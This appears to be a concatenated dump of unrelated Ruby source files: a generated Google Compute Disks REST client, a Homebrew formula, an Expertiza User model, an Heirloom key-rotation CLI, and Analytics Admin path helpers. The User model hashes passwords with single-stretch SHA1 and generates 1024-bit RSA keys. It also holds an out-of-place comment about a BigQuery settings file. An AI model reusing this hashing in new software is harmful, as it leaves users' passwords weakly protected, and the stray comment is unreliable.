# @yieldparam result [::Google::Cloud::Compute::V1::DiskList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::DiskList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
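# A hypothetical usage sketch (placeholder names; follows the pageToken /
# nextPageToken contract described above):
#
# @example List disks in a zone, fetching a second page if present
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   page = client.list(project: "my-project", zone: "us-central1-a", max_results: 50)
#   page.items.each { |disk| puts disk.name }
#   unless page.next_page_token.to_s.empty?
#     client.list(project: "my-project", zone: "us-central1-a",
#                 max_results: 50, page_token: page.next_page_token)
#   end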
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListDisksRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::DiskList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Removes resource policies from a disk.
#
# @overload remove_resource_policies(request, options = nil)
# Pass arguments to `remove_resource_policies` via a request object, either of type
# {::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload remove_resource_policies(disk: nil, disks_remove_resource_policies_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `remove_resource_policies` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The disk name for this request.
# @param disks_remove_resource_policies_request_resource [::Google::Cloud::Compute::V1::DisksRemoveResourcePoliciesRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
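# A hypothetical usage sketch (placeholder names, mirroring the
# add_resource_policies example above):
#
# @example Detach a resource policy from a disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   operation = client.remove_resource_policies(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk: "my-disk",
#     disks_remove_resource_policies_request_resource: {
#       resource_policies: ["regions/us-central1/resourcePolicies/daily-snapshots"]
#     }
#   )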
def remove_resource_policies request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_remove_resource_policies request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Resizes the specified persistent disk. You can only increase the size of the disk.
#
# @overload resize(request, options = nil)
# Pass arguments to `resize` via a request object, either of type
# {::Google::Cloud::Compute::V1::ResizeDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ResizeDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload resize(disk: nil, disks_resize_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `resize` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The name of the persistent disk.
# @param disks_resize_request_resource [::Google::Cloud::Compute::V1::DisksResizeRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
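# A hypothetical usage sketch (placeholder names; the new size must exceed the
# current size, per the note above):
#
# @example Grow a disk to 200 GB
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   operation = client.resize(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk: "my-disk",
#     disks_resize_request_resource: { size_gb: 200 }
#   )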
def resize request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ResizeDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_resize request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Sets the access control policy on the specified resource. Replaces any existing policy.
#
# @overload set_iam_policy(request, options = nil)
# Pass arguments to `set_iam_policy` via a request object, either of type
# {::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload set_iam_policy(project: nil, resource: nil, zone: nil, zone_set_policy_request_resource: nil)
# Pass arguments to `set_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @param zone_set_policy_request_resource [::Google::Cloud::Compute::V1::ZoneSetPolicyRequest, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Policy]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
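# A hypothetical usage sketch (placeholder names; the binding shape is assumed
# from the standard IAM Policy message, not defined in this file):
#
# @example Replace the IAM policy on a disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   policy = client.set_iam_policy(
#     project: "my-project",
#     zone: "us-central1-a",
#     resource: "my-disk",
#     zone_set_policy_request_resource: {
#       policy: {
#         bindings: [{ role: "roles/compute.viewer", members: ["user:alice@example.com"] }]
#       }
#     }
#   )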
def set_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_set_iam_policy request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Policy.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.
#
# @overload set_labels(request, options = nil)
# Pass arguments to `set_labels` via a request object, either of type
# {::Google::Cloud::Compute::V1::SetLabelsDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::SetLabelsDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload set_labels(project: nil, request_id: nil, resource: nil, zone: nil, zone_set_labels_request_resource: nil)
# Pass arguments to `set_labels` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @param zone_set_labels_request_resource [::Google::Cloud::Compute::V1::ZoneSetLabelsRequest, ::Hash]
# The body resource for this request
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def set_labels request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::SetLabelsDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_set_labels request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns permissions that a caller has on the specified resource.
#
# @overload test_iam_permissions(request, options = nil)
# Pass arguments to `test_iam_permissions` via a request object, either of type
# {::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload test_iam_permissions(project: nil, resource: nil, test_permissions_request_resource: nil, zone: nil)
# Pass arguments to `test_iam_permissions` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param test_permissions_request_resource [::Google::Cloud::Compute::V1::TestPermissionsRequest, ::Hash]
# The body resource for this request
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::TestPermissionsResponse]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::TestPermissionsResponse]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def test_iam_permissions request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_test_iam_permissions request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::TestPermissionsResponse.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the Disks REST API.
#
# This class represents the configuration for Disks REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::Disks::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::Disks::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 60.299239 | 477 | 0.580761 |
872862a01c2bebea64693a438d72e07e3d0eb9d7 | 586 | class Libbsd < Formula
desc "Utility functions from BSD systems"
homepage "https://libbsd.freedesktop.org/"
url "https://libbsd.freedesktop.org/releases/libbsd-0.11.3.tar.xz"
sha256 "ff95cf8184151dacae4247832f8d4ea8800fa127dbd15033ecfe839f285b42a1"
license "BSD-3-Clause"
depends_on "libmd"
depends_on :linux
def install
system "./configure",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
assert_match "strtonum", shell_output("nm #{lib/"libbsd.so"}")
end
end
| 25.478261 | 75 | 0.699659 |
62aad48a3e5bcf2a4f842abb3c25c6683fbff71c | 10,334 | class User < ActiveRecord::Base
acts_as_authentic do |config|
config.validates_uniqueness_of_email_field_options = {if: -> { false }} # Don't validate email uniqueness
config.crypto_provider = Authlogic::CryptoProviders::Sha1
Authlogic::CryptoProviders::Sha1.join_token = ''
Authlogic::CryptoProviders::Sha1.stretches = 1
end
has_many :participants, class_name: 'Participant', foreign_key: 'user_id', dependent: :destroy
has_many :assignment_participants, class_name: 'AssignmentParticipant', foreign_key: 'user_id', dependent: :destroy
has_many :assignments, through: :participants
has_many :teams_users, dependent: :destroy
has_many :teams, through: :teams_users
has_many :bids, dependent: :destroy
has_many :sent_invitations, class_name: 'Invitation', foreign_key: 'from_id', dependent: :destroy
has_many :received_invitations, class_name: 'Invitation', foreign_key: 'to_id', dependent: :destroy
has_many :children, class_name: 'User', foreign_key: 'parent_id'
has_many :track_notifications, dependent: :destroy
belongs_to :parent, class_name: 'User'
belongs_to :role
validates :name, presence: true
validates :name, uniqueness: true
validates :email, presence: {message: "can't be blank"}
validates :email, format: {with: /\A[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\z/i, allow_blank: true}
before_validation :randomize_password, if: ->(user) { user.new_record? && user.password.blank? } # AuthLogic
after_create :email_welcome
scope :superadministrators, -> { where role_id: Role.superadministrator }
scope :superadmins, -> { superadministrators }
scope :administrators, -> { where role_id: Role.administrator }
scope :admins, -> { administrators }
scope :instructors, -> { where role_id: Role.instructor }
scope :tas, -> { where role_id: Role.ta }
scope :students, -> { where role_id: Role.student }
has_paper_trail
def salt_first?
true
end
def list_mine(object_type, user_id)
object_type.where(["instructor_id = ?", user_id])
end
def get_available_users(name)
lesser_roles = role.get_parents
    all_users = User.where("name LIKE ?", "#{name}%").limit(20) # higher limit, since we're filtering
visible_users = all_users.select {|user| lesser_roles.include? user.role }
visible_users[0, 10] # the first 10
end
def can_impersonate?(user)
return true if self.role.super_admin?
return true if self.teaching_assistant_for?(user)
return true if self.recursively_parent_of(user)
false
end
def recursively_parent_of(user)
p = user.parent
return false if p.nil?
return true if p == self
return false if p.role.super_admin?
self.recursively_parent_of(p)
end
def get_user_list
user_list = []
# If the user is a super admin, fetch all users
user_list = SuperAdministrator.get_user_list if self.role.super_admin?
# If the user is an instructor, fetch all users in his course/assignment
user_list = Instructor.get_user_list(self) if self.role.instructor?
# If the user is a TA, fetch all users in his courses
user_list = Ta.get_user_list(self) if self.role.ta?
# Add the children to the list
unless self.role.super_admin?
User.all.find_each do |u|
if recursively_parent_of(u)
user_list << u unless user_list.include?(u)
end
end
end
user_list.uniq
end
# Zhewei: anonymized view for demo purposes - 1/3/2018
def self.anonymized_view?(ip_address = nil)
anonymized_view_starter_ips = $redis.get('anonymized_view_starter_ips') || ''
return true if ip_address and anonymized_view_starter_ips.include? ip_address
false
end
def name(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + ' ' + self.id.to_s : self[:name]
end
def fullname(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + ', ' + self.id.to_s : self[:fullname]
end
def first_name(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name : fullname.try(:[], /,.+/).try(:[], /\w+/) || ''
end
def email(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + '_' + self.id.to_s + '@mailinator.com' : self[:email]
end
def super_admin?
role.name == 'Super-Administrator'
end
delegate :admin?, to: :role
delegate :student?, to: :role
def creator_of?(user)
self == user.creator
end
# Function which has a MailerHelper which sends the mail welcome email to the user after signing up
def email_welcome
MailerHelper.send_mail_to_user(self, "Your Expertiza password has been created", "user_welcome", password)
end
def valid_password?(password)
Authlogic::CryptoProviders::Sha1.stretches = 1
Authlogic::CryptoProviders::Sha1.matches?(crypted_password, self.password_salt.to_s + password)
end
# Resets the password to be mailed to the user
def reset_password
randomize_password
save
password
end
def self.import(row_hash, _row_header, session, id = nil)
raise ArgumentError, "Only #{row_hash.length} column(s) is(are) found. It must contain at least username, full name, email." if row_hash.length < 3
user = User.find_by_name(row_hash[:name])
if user.nil?
attributes = ImportFileHelper.define_attributes(row_hash)
user = ImportFileHelper.create_new_user(attributes, session)
password = user.reset_password
MailerHelper.send_mail_to_user(user, "Your Expertiza account has been created.", "user_welcome", password).deliver
else
user.email = row_hash[:email]
user.fullname = row_hash[:fullname]
user.parent_id = (session[:user]).id
user.save
end
end
def self.yesorno(elt)
if elt == true
"yes"
elsif elt == false
"no"
else
""
end
end
# locate User based on provided login.
# If user supplies e-mail or name, the
# helper will try to find that User account.
def self.find_by_login(login)
user = User.find_by(email: login)
if user.nil?
      items = login.split("@")
      short_name = items[0]
      user_list = User.where("name = ?", short_name)
      user = user_list.first if !user_list.nil? && user_list.length == 1
end
user
end
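  # Hedged usage sketch for the lookup above (sample values are ours, not
  # from the original source):
  #
  #   User.find_by_login('[email protected]') # matches on the email column first
  #   User.find_by_login('jsmith')            # falls back to the name column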
def set_instructor(new_assignment)
new_assignment.instructor_id = self.id
end
def get_instructor
self.id
end
def instructor_id
case role.name
when 'Super-Administrator' then id
when 'Administrator' then id
when 'Instructor' then id
when 'Teaching Assistant' then Ta.get_my_instructor(id)
else raise NotImplementedError, "for role #{role.name}"
end
end
# generate a new RSA public/private key pair and create our own X509 digital certificate which we
# save in the database. The private key is returned by the method but not saved.
def generate_keys
# check if we are replacing a digital certificate already generated
replacing_key = true unless self.digital_certificate.nil?
# generate the new key pair
new_key = OpenSSL::PKey::RSA.generate(1024)
self.public_key = new_key.public_key.to_pem
save
# when replacing an existing key, update any digital signatures made previously with the new key
if replacing_key
participants = AssignmentParticipant.where(user_id: self.id)
      participants.each do |participant|
        AssignmentParticipant.grant_publishing_rights(new_key.to_pem, [participant]) if participant.permission_granted
      end
end
# return the new private key
new_key.to_pem
end
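  # Hedged usage sketch: only the public half is persisted above, so the
  # caller must deliver the returned private key to the user right away.
  #
  #   pem = user.generate_keys              # re-grants publishing rights when rotating
  #   OpenSSL::PKey::RSA.new(pem).private?  # => true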
def initialize(attributes = nil)
super(attributes)
Authlogic::CryptoProviders::Sha1.stretches = 1
@email_on_review = true
@email_on_submission = true
@email_on_review_of_review = true
@copy_of_emails = false
end
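  # Assumed shape of .bigquery_settings.yml -- only project_id and dataset are
  # read directly by these tests; credential fields depend on the gem's setup:
  #
  #   project_id: my-gcp-project
  #   dataset: my_dataset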
def self.export(csv, _parent_id, options)
users = User.all
users.each do |user|
tcsv = []
tcsv.push(user.name, user.fullname, user.email) if options["personal_details"] == "true"
tcsv.push(user.role.name) if options["role"] == "true"
tcsv.push(user.parent.name) if options["parent"] == "true"
tcsv.push(user.email_on_submission, user.email_on_review, user.email_on_review_of_review, user.copy_of_emails) if options["email_options"] == "true"
tcsv.push(user.handle) if options["handle"] == "true"
csv << tcsv
end
end
def creator
parent
end
def self.export_fields(options)
fields = []
fields.push("name", "full name", "email") if options["personal_details"] == "true"
fields.push("role") if options["role"] == "true"
fields.push("parent") if options["parent"] == "true"
fields.push("email on submission", "email on review", "email on metareview") if options["email_options"] == "true"
fields.push("handle") if options["handle"] == "true"
fields
end
def self.from_params(params)
user = if params[:user_id]
User.find(params[:user_id])
else
User.find_by name: params[:user][:name]
end
if user.nil?
newuser = url_for controller: 'users', action: 'new'
raise "Please <a href='#{newuser}'>create an account</a> for this user to continue."
end
user
end
def teaching_assistant_for?(student)
return false unless teaching_assistant?
return false if student.role.name != 'Student'
# We have to use the Ta object instead of User object
# because single table inheritance is not currently functioning
ta = Ta.find(id)
    ta.courses_assisted_with.any? do |c|
      c.assignments.map(&:participants).flatten.map(&:user_id).include? student.id
    end
end
  def teaching_assistant?
    role.ta?
  end
def self.search_users(role, user_id, letter, search_by)
key_word = {'1' => 'name', '2' => 'fullname', '3' => 'email'}
sql = "(role_id in (?) or id = ?) and #{key_word[search_by]} like ?"
if key_word.include? search_by
search_filter = '%' + letter + '%'
users = User.order('name').where(sql, role.get_available_roles, user_id, search_filter)
else # default used when clicking on letters
search_filter = letter + '%'
users = User.order('name').where("(role_id in (?) or id = ?) and name like ?", role.get_available_roles, user_id, search_filter)
end
users
end
end
| 33.993421 | 154 | 0.692471 |
33c24c7588440c0552907d90610c8787d4596e6b | 3,315 | module Heirloom
module CLI
class Rotate
include Heirloom::CLI::Shared
def self.command_summary
'Rotate keys for an Heirloom'
end
def initialize
@opts = read_options
@logger = HeirloomLogger.new :log_level => @opts[:level]
@config = load_config :logger => @logger,
:opts => @opts
ensure_valid_options :provided => @opts,
:required => [:name, :id, :old_secret, :new_secret],
:config => @config
@catalog = Heirloom::Catalog.new :name => @opts[:name],
:config => @config
@archive = Archive.new :name => @opts[:name],
:config => @config,
:id => @opts[:id]
unless @opts[:bucket_prefix]
ensure_archive_exists :archive => @archive,
:config => @config
end
# Lookup upload regions, metadata region, and bucket_prefix from simpledb unless specified
@opts[:regions] ||= @catalog.regions
@opts[:region] ||= @catalog.regions.first
@opts[:bucket_prefix] ||= @catalog.bucket_prefix
end
def rotate
@archive.rotate @opts
rescue Heirloom::Exceptions::RotateFailed => e
@config.logger.error e.message
exit 1
end
private
def read_options
Trollop::options do
version Heirloom::VERSION
banner <<-EOS
#{Rotate.command_summary}.
Will download the heirloom to temp directory, decrypt, encrypt, and upload, replacing original.
Usage:
heirloom rotate -n NAME -i ID --new-secret MY_NEW_SECRET --old-secret MY_OLD_SECRET
To rotate Heirloom without looking up details in SimpleDB, specify region (-r) and bucket_prefix (-b) options.
EOS
opt :bucket_prefix, "Bucket prefix of the Heirloom to download.", :type => :string
opt :help, "Display Help"
opt :id, "ID of the Heirloom to rotate.", :type => :string
opt :level, "Log level [debug|info|warn|error].", :type => :string,
:default => 'info'
opt :metadata_region, "AWS region to store Heirloom metadata.", :type => :string
opt :name, "Name of Heirloom.", :type => :string
opt :region, "Region to download Heirloom.", :type => :string,
:default => 'us-west-1'
opt :new_secret, "New Secret for encrypted Heirloom.", :type => :string,
:short => :none
opt :old_secret, "Old secret for encrypted Heirloom.", :type => :string,
:short => :none
opt :aws_access_key, "AWS Access Key ID", :type => :string,
:short => :none
opt :aws_secret_key, "AWS Secret Access Key", :type => :string,
:short => :none
opt :environment, "Environment (defined in heirloom config)", :type => :string
end
end
end
end
end
| 38.103448 | 110 | 0.505581 |
0375c4428f064aab2a4fb37d9e97bae62803334d | 11,335 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Analytics
module Admin
module V1alpha
module AnalyticsAdminService
# Path helper methods for the AnalyticsAdminService API.
module Paths
##
# Create a fully-qualified Account resource string.
#
# The resource will be in the following format:
#
# `accounts/{account}`
#
# @param account [String]
#
# @return [::String]
def account_path account:
"accounts/#{account}"
end
##
# Create a fully-qualified ConversionEvent resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/conversionEvents/{conversion_event}`
#
# @param property [String]
# @param conversion_event [String]
